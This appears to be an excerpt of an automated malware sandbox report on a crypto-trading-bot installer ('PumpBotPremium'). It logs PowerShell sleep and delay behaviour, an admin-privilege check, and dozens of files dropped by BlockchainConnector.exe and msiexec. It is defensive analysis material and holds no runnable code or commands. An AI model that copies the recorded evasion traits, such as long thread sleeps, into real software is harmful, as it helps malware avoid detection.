Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898516
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898266
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898047
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897937
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897712
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899875
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899765
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899656
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899547
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899437
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899218
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899109
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898781
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898672
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898343
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898125
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898015
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897906

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7119	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1263	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4569	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1724	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5074
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 738
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6187
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1237
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2538

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_philox.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_cffi_backend.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\.libs\libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\bit_generator.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\sip.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI8554.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI7BF7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5widgets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md__mypyc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_brotli.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_umath.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_generator.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_common.pyd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI7C48.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imaging.pyd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI7B99.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\cv2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pythoncom310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_mt19937.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_bz2.pyd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI7CB7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\fft\_pocketfft_internal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_tests.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\mtrand.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingft.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5gui.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\concrt140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_bounded_integers.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_sfc64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ssl.pyd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI7C27.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\win32crypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\linalg\_umath_linalg.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_pcg64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_webp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI7C87.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingcms.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\opencv_videoio_ffmpeg490_64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_tkinter.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_3-50691

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2000	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1880	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3384	Thread sleep count: 4569 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -899884s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -899772s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -899652s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -899522s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -899373s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -899262s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -899151s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 344	Thread sleep count: 1724 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4280	Thread sleep count: 5074 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -900000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -899888s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -899747s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -899636s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -899526s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -899377s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -899250s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -899140s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5932	Thread sleep count: 738 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -899031s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -898921s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -898812s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -898703s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -898593s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -898484s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -898374s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -898265s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -898156s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -898046s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -897937s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -897828s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -897708s >= -30000s
